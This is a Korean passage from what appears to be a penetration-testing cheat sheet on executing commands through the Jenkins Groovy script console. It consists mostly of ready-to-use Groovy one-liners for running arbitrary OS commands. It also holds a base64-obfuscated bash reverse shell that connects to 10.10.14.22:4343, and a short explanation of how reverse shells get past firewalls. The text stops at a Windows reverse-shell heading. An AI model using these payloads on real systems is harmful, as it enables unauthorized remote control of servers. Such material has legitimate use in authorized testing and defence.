def process ="PowerShell.exe <WHATEVER>".execute()println "Found text ${process.text}"
당신은 다음을 사용하여 명령을 실행할 수 있습니다: cmd.exe /c dir
리눅스에서는 다음을 수행할 수 있습니다: "ls /".execute().text
텍스트 내부에 _따옴표_와 _작은 따옴표_를 사용해야 하는 경우, 페이로드를 실행하기 위해 """PAYLOAD""" (세 개의 큰 따옴표)를 사용할 수 있습니다.
다른 유용한 그루비 스크립트는 다음과 같습니다 (대괄호 안에 명령어를 삽입하세요):
def sout = new StringBuffer(), serr = new StringBuffer()def proc ='[INSERT COMMAND]'.execute()proc.consumeProcessOutput(sout, serr)proc.waitForOrKill(1000)println "out> $sout err> $serr"
리눅스에서의 리버스 쉘
리버스 쉘은 원격 시스템에 접근하기 위해 사용되는 기술입니다. 리버스 쉘을 사용하면 공격자는 대상 시스템에 쉘을 열어 원격으로 명령을 실행할 수 있습니다. 이는 편리하게도 방화벽이나 NAT(Network Address Translation) 장치를 우회할 수 있는 방법입니다.
리버스 쉘을 설정하기 위해서는 다음 단계를 따라야 합니다:
공격자는 대상 시스템에 악성 코드를 배포합니다. 이 코드는 공격자가 접근할 수 있는 서버에 연결하고, 명령을 전달받을 수 있는 쉘을 엽니다.
대상 시스템은 악성 코드를 실행하고, 공격자의 서버에 연결합니다.
공격자는 대상 시스템에 명령을 전달하고, 결과를 받을 수 있습니다.
리버스 쉘은 해커들이 시스템을 침투하고 제어하기 위해 자주 사용되는 기술 중 하나입니다. 따라서 시스템 보안을 강화하기 위해서는 이러한 공격을 예방하고 탐지할 수 있는 방법을 구현해야 합니다.
def sout = new StringBuffer(), serr = new StringBuffer()def proc = 'bash -c {echo,YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4yMi80MzQzIDA+JjEnCg==}|{base64,-d}|{bash,-i}'.execute()
proc.consumeProcessOutput(sout, serr)proc.waitForOrKill(1000)println "out> $sout err> $serr"
윈도우에서의 역쉘
PS 역쉘을 가진 HTTP 서버를 준비하고 Jeking을 사용하여 다운로드하고 실행할 수 있습니다:
